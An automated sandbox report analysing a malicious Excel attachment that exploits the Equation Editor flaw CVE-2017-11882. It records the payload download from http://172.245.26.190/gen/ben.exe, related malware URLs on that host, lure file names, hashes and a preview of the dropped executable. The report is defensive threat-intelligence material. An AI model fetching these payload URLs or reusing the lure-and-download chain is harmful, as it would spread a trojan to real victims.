Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Security Software Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol121	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Extra Window Memory Injection1	Cached Domain Credentials	System Information Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
new order no. Hc511 for sept.xlsx	31%	Virustotal		Browse
new order no. Hc511 for sept.xlsx	24%	ReversingLabs	Document-OLE.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe	16%	ReversingLabs
C:\Users\Public\vbc.exe	16%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://172.245.26.190/gen/ben.exe	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://172.245.26.190/gen/ben.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp	false		high
http://creativecommons.org/licenses/by-nc-sa/3.0/	vbc.exe.4.dr	false		high
http://www.icra.org/vocabulary/.	vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.day.com/dam/1.0	74DB69FF.emf.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.245.26.190	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	482516
Start date:	13.09.2021
Start time:	20:57:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	new order no. Hc511 for sept.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.winXLSX@4/21@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 29.2% (good quality ratio 11.5%) Quality average: 21.1% Quality standard deviation: 30%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:58:57	API Interceptor	53x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.245.26.190	Enquiry56151.xlsx	Get hash	malicious	Browse	172.245.26.190/kell/man.exe
	TT SWIFT.xlsx	Get hash	malicious	Browse	172.245.26.190/aka/boy.exe
	Purchase Order 334779.xlsx	Get hash	malicious	Browse	172.245.26.190/kvi.exe
	PO - NEW ORDER.xlsx	Get hash	malicious	Browse	172.245.26.190/tmt.exe
	Order Faruechoc.xlsx	Get hash	malicious	Browse	172.245.26.190/ama/tzd.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	ORDER 5172020.xlsx	Get hash	malicious	Browse	198.12.84.109
	Invoice Scan Copy.xlsx	Get hash	malicious	Browse	192.3.141.149
	URGENT ORDER(TB-0008)-21 full.xlsx	Get hash	malicious	Browse	192.3.146.254
	New Order.xlsx	Get hash	malicious	Browse	23.95.13.175
	PO530CB.docx	Get hash	malicious	Browse	198.46.199.161
	PO530CB.docx	Get hash	malicious	Browse	198.46.199.161
	New_Order.xlsx	Get hash	malicious	Browse	23.95.13.175
	nirvana.i586	Get hash	malicious	Browse	23.94.24.109
	09112021_pdf.vbs	Get hash	malicious	Browse	23.94.82.41
	arm	Get hash	malicious	Browse	192.210.189.186
	OA9862qYq7.exe	Get hash	malicious	Browse	75.127.1.230
	skid.x86	Get hash	malicious	Browse	23.95.230.108
	1F2nMkl09B	Get hash	malicious	Browse	23.95.230.108
	m7i42ZEOwQ	Get hash	malicious	Browse	23.95.230.108
	DUz0tkQgds	Get hash	malicious	Browse	23.95.230.108
	B04DkMODlX	Get hash	malicious	Browse	23.95.230.108
	Yj738UduyX	Get hash	malicious	Browse	23.95.230.108
	VrflhtSfz4	Get hash	malicious	Browse	23.95.230.108
	DdU1LcIRIE	Get hash	malicious	Browse	23.95.230.108
	ZboowBSN5b	Get hash	malicious	Browse	192.3.80.128

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	131072
Entropy (8bit):	6.856294769172108
Encrypted:	false
SSDEEP:	1536:pPZofiqowwrfmHQbo8WutIgP1a06aO6QqnOLLOgsm0s/g9CuLwJN8SCImz:w4wWps4agd+qYnvIbLwP8dImz
MD5:	652E9A32D7FDC6783BC63C097D8ACF74
SHA1:	E3879E6A4F9A60CAE459690C28B4EB0B3B452957
SHA-256:	9A61D81097E2AD10AA0065980D204EAFEFBF7CD089E774B878C69607E211A0DB
SHA-512:	7360F84059440734FC4B4E7AEBCE472C55A8EED75CB38D09759DC9A6850413D7470706431303BBD9ADAC410FA0ED955BC798D2E0310E46AFA3E278FBFF0F8587
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Reputation:	low
IE Cache URL:	http://172.245.26.190/gen/ben.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...................D.....=.....Rich...........PE..L......J.....................P......t.............@............................................................................(........)..................................................................(... .......0............................text............................... ..`.data...............................@....rsrc....).......0..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\17D20365.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B7CAE80.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C5515F9.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6815
Entropy (8bit):	7.871668067811304
Encrypted:	false
SSDEEP:	96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
MD5:	E2267BEF7933F02C009EAEFC464EB83D
SHA1:	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
SHA-256:	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
SHA-512:	AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.\|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...\|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...\|.RiNY.+.b...E.W.8^..o....;'..\.}........\|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\301E988E.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37E16A22.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\40DEFBB.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C6453A6.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	33795
Entropy (8bit):	7.909466841535462
Encrypted:	false
SSDEEP:	768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
MD5:	613C306C3CC7C3367595D71BEECD5DE4
SHA1:	CB5E280A2B1F4F1650040842BACC9D3DF916275E
SHA-256:	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
SHA-512:	FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
Malicious:	false
Preview:	.PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."(.G.L.{'?..z.w.93..".........~....06\|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.\|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{...=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f\|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A2636F.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67539073.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74DB69FF.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.812374168060382
Encrypted:	false
SSDEEP:	3072:034UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:W4UcLe0JOcXuunhqcS
MD5:	92CA5B4EC2C61E958C0BD5B74E5E18FD
SHA1:	8B5B7EB1EC282AFCF9E970E33909911D2499EE15
SHA-256:	B852F9D4B6A896CE49017C4EB095508861A9223A8A9F28B6BBE4614DE3BD1476
SHA-512:	ADF1B8F42061D382C5EEBDAA71636E1A449350F8464D86F2965E06446D617B7E6C54D3E52AE5B32763DFBDB013C18A9B8BF9227D5CD0739BBCABCA97BDC6D697
Malicious:	false
Preview:	....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$...H._..f.Y.@..%...$._.h._......._.L._.RQ$[.._..._.....4._..._.$Q$[.._..._. ...Id.Y.._..._. ............d.Y........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........X._.X....._..._..8.Y........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... .C.6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\88345337.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
